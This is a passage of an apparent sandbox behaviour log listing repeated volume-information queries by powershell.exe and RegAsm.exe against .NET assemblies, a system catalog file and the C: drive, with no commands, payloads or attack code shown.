Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

